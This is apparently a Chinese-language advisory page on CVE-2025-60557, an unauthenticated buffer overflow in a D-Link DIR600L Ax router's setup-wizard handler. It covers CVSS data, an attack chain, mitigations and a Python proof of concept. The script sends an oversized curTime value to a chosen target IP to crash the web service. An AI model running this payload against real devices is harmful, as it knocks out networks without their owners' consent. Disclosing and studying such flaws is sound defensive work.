CVE-2025-60557 D-Link DIR600L Ax 缓冲区溢出漏洞

漏洞信息

漏洞编号

CVE-2025-60557

漏洞类型

缓冲区溢出

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

D-Link DIR600L Ax FW116WWb01

漏洞概述

CVE-2025-60557是D-Link DIR600L Ax路由器固件FW116WWb01中的一个高危缓冲区溢出漏洞。该漏洞存在于Web管理界面的formSetEasy_Wizard函数中，攻击者可以通过精心构造的curTime参数触发缓冲区溢出。由于该漏洞位于路由器固件的网络服务组件中，攻击者无需认证即可通过HTTP请求远程利用此漏洞。成功利用此漏洞可能导致路由器服务中断（拒绝服务攻击），在特定条件下还可能实现代码执行，从而完全控制受影响的路由器设备。此类漏洞对网络基础设施安全构成严重威胁，因为路由器通常是家庭和企业网络的关键入口点。一旦路由器被攻破，攻击者可以监控网络流量、进行中间人攻击或进一步渗透内网其他设备。建议受影响的用户尽快采取防护措施并关注厂商更新。

技术细节

该缓冲区溢出漏洞位于D-Link DIR600L Ax路由器的Web管理界面功能中，具体在formSetEasy_Wizard函数的curTime参数处理逻辑中。当用户通过Web界面设置向导功能时，系统会处理curTime参数值。问题在于该函数在处理curTime参数时未对输入数据进行充分的边界检查和长度验证，导致攻击者可以向该参数注入超长字符串。当超长字符串被传递给目标缓冲区时，会发生缓冲区溢出，覆盖相邻的内存区域。攻击者可以通过发送精心构造的HTTP POST请求来利用此漏洞，构造的请求中包含超长的curTime参数值。由于该漏洞存在于路由器的网络服务进程中，成功的溢出攻击可能导致进程崩溃（拒绝服务）或在某些情况下覆盖返回地址实现代码执行。攻击者利用此漏洞无需任何认证凭证，可直接通过互联网远程发起攻击。

攻击链分析

STEP 1

步骤1

攻击者识别目标D-Link DIR600L Ax路由器，确认其运行FW116WWb01固件版本

STEP 2

步骤2

攻击者访问路由器的Web管理界面，通常位于http://[target-ip]/Easy_Wizard.htm

STEP 3

步骤3

攻击者构造包含超长字符串的HTTP POST请求，目标参数为curTime，发送到/formSetEasy_Wizard.cgi端点

STEP 4

步骤4

路由器Web服务进程在处理curTime参数时未进行边界检查，导致缓冲区溢出

STEP 5

步骤5

超长数据覆盖相邻内存区域，可能导致进程崩溃（DoS）或控制流劫持

STEP 6

步骤6

在成功利用的情况下，攻击者可能获得路由器控制权，可进行流量监控、恶意重定向等后续攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
CVE-2025-60557 PoC - D-Link DIR600L Ax Buffer Overflow
formSetEasy_Wizard curTime Parameter Buffer Overflow
"""

import requests
import argparse

def exploit_buffer_overflow(target_ip, target_port=80):
    """
    Exploit buffer overflow in D-Link DIR600L Ax formSetEasy_Wizard
    via curTime parameter
    """
    # Target URL for the vulnerable endpoint
    url = f"http://{target_ip}:{target_port}/formSetEasy_Wizard.cgi"
    
    # Buffer overflow payload - 500+ bytes to trigger overflow
    # Adjust size based on target environment
    overflow_length = 1000
    overflow_payload = "A" * overflow_length
    
    # Construct the exploit request
    data = {
        "curTime": overflow_payload,
        "submit-url": "/Easy_Wizard.htm"
    }
    
    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
    }
    
    print(f"[*] Sending exploit payload to {url}")
    print(f"[*] Payload length: {overflow_length} bytes")
    
    try:
        response = requests.post(url, data=data, headers=headers, timeout=10)
        print(f"[*] Response status: {response.status_code}")
        print(f"[*] Exploit sent successfully")
        return True
    except requests.exceptions.RequestException as e:
        print(f"[!] Error: {e}")
        return False

def main():
    parser = argparse.ArgumentParser(description='CVE-2025-60557 PoC')
    parser.add_argument('-t', '--target', required=True, help='Target IP address')
    parser.add_argument('-p', '--port', type=int, default=80, help='Target port')
    
    args = parser.parse_args()
    exploit_buffer_overflow(args.target, args.port)

if __name__ == "__main__":
    main()

影响范围

D-Link DIR600L Ax FW116WWb01

防御指南

临时缓解措施

临时缓解措施：1) 禁用路由器的远程管理功能，仅通过本地局域网访问Web管理界面；2) 在网络边界防火墙上屏蔽对路由器80/443端口的外部访问；3) 监控路由器日志关注异常请求；4) 考虑使用VPN连接后进行本地管理操作；5) 评估是否需要更换已停止支持的旧型号设备。